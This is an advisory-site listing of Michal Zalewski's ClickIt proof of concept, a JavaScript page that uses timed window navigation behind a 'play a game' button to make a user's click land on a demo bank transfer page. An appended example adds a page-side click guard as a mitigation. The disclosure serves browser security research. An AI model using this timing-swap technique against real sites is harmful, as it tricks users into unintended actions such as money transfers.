ClickIt Proof Of Concept

2011-12-13T00:00:00
ID PACKETSTORM:107787
Type packetstorm
Reporter Michal Zalewski
Modified 2011-12-13T00:00:00

Description

```html
<h3><i>X-Frame-Options</i> is worth less than you think</h3>

<script>
var w;
var dummy;
var it;

// Precache stuff.

var x = new Image();
x.src = 'http://banking.beaver-peak.us/banking_interface/transfers/';

var x2 = new Image();
x2.src = 'http://banking.beaver-peak.us/banking_interface/transfers/beaver-peak.jpg';

var x3 = new Image();
x3.src = 'http://lcamtuf.coredump.cx/clickit/win.html';

var x4 = new Image();
x4.src = 'http://lcamtuf.coredump.cx/clickit/win.jpg';

// Open the target page in a new window, then hand over to complete().
function prepare() {
  w = open('http://banking.beaver-peak.us/banking_interface/transfers/', '_blank');
  setTimeout(complete, 300);
}

// Navigate the opened window to the attacker-controlled page.
function complete() {
  w.location.href = 'http://lcamtuf.coredump.cx/clickit/attacker.html';
  setTimeout(goback, 1000);
}

// Poll until reading the window's document from here fails, then
// navigate the window to the final page after a short delay.
function goback() {
  try {
    if (w.document.body.innerHTML == undefined) throw 1;
    setTimeout(goback, 100);
  } catch (e) {
    // That one case where prompts.tab_modal.enabled=true would have helped in Firefox...
    if (navigator.userAgent.indexOf('Firefox/') != -1)
      setTimeout('w.location.href = "http://lcamtuf.coredump.cx/clickit/win.html"', 1500);
    else
      setTimeout('w.location.href = "http://lcamtuf.coredump.cx/clickit/win.html"', 500);
  }
}
</script>

<p>
JavaScript allows you to exploit human cognitive abilities to a remarkable extent; tools such as
window positioning, <code>history.forward()</code> and <code>history.back()</code>, open some
scary possibilities that we are <a href="http://lcamtuf.blogspot.com/2011/12/x-frame-options-or-solving-wrong.html">completely unprepared to deal with</a>.
This proof-of-concept aims to demonstrate this; while it is intentionally crude and makes no real effort to
conceal its operation, the transitions <a href="http://lcamtuf.coredump.cx/switch/">can be made seamless</a> and very
difficult to perceive. Very accurate click prediction can be achieved by carefully measuring
mouse velocity and distance to destination, too.

<p>
I discuss these attacks and many other unsolved challenges in web app design in
<i><a href="http://lcamtuf.coredump.cx/tangled/">"The Tangled Web"</a></i>.
A similar approach poses a problem with many browser UIs; for that,
<a href="http://lcamtuf.blogspot.com/2010/08/on-designing-uis-for-non-robots.html">check out this post</a>.

<p>
<input type=submit value="Click here to play a game" onclick="prepare()">
```
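As an added example that is not part of Zalewski's PoC, the following shows one page-side mitigation a target site such as the banking page above could apply against this timing-driven page swap: a sensitive control ignores activations that arrive before the document has been visible for a minimum interval and before the pointer has moved inside it, since a page swapped in under the cursor is clicked within a few hundred milliseconds of loading with no in-page motion. The function names, the 1000 ms threshold and the `data-sensitive` attribute are assumptions, and this narrows the attack window rather than closing it.

```javascript
// Added example (not part of the original PoC). The guard is written as a pure
// state machine with injected timestamps so it can be exercised without a DOM;
// the browser wiring at the bottom is skipped when run under Node.
function createClickGuard(opts) {
  const minVisibleMs = opts && opts.minVisibleMs !== undefined ? opts.minVisibleMs : 1000; // assumed default
  let visibleSince = null;   // timestamp when the page last became visible/focused
  let pointerMoved = false;  // has the pointer moved inside the page since then?
  return {
    // Call when the document becomes visible or gains focus (and on load).
    onVisible(now) { visibleSince = now; pointerMoved = false; },
    // Call when the document is hidden or loses focus: disarm until visible again.
    onHidden() { visibleSince = null; pointerMoved = false; },
    // Call on pointer movement within the page.
    onPointerMove() { if (visibleSince !== null) pointerMoved = true; },
    // Decide whether an activation at time `now` should be honoured.
    shouldAccept(now) {
      if (visibleSince === null) return false;            // page not visible/focused
      if (now - visibleSince < minVisibleMs) return false; // appeared too recently
      return pointerMoved;                                 // no in-page motion yet
    },
  };
}

// Browser wiring: arm/disarm on visibility and focus changes, track pointer
// motion, and veto clicks on controls marked data-sensitive (assumed attribute).
if (typeof document !== 'undefined') {
  const guard = createClickGuard({ minVisibleMs: 1000 });
  const tick = () => performance.now();
  if (document.visibilityState === 'visible') guard.onVisible(tick());
  document.addEventListener('visibilitychange', () =>
    document.visibilityState === 'visible' ? guard.onVisible(tick()) : guard.onHidden());
  window.addEventListener('focus', () => guard.onVisible(tick()));
  window.addEventListener('blur', () => guard.onHidden());
  document.addEventListener('pointermove', () => guard.onPointerMove());
  document.querySelectorAll('[data-sensitive]').forEach((el) =>
    el.addEventListener('click', (ev) => {
      if (!guard.shouldAccept(tick())) { ev.preventDefault(); ev.stopImmediatePropagation(); }
    }, true));
}
```

The capture-phase listener runs before the control's own handler, so a vetoed click never reaches the transfer logic; the server side should still enforce its own confirmation step, since a client-side delay can be bypassed by a user agent that does not honour it.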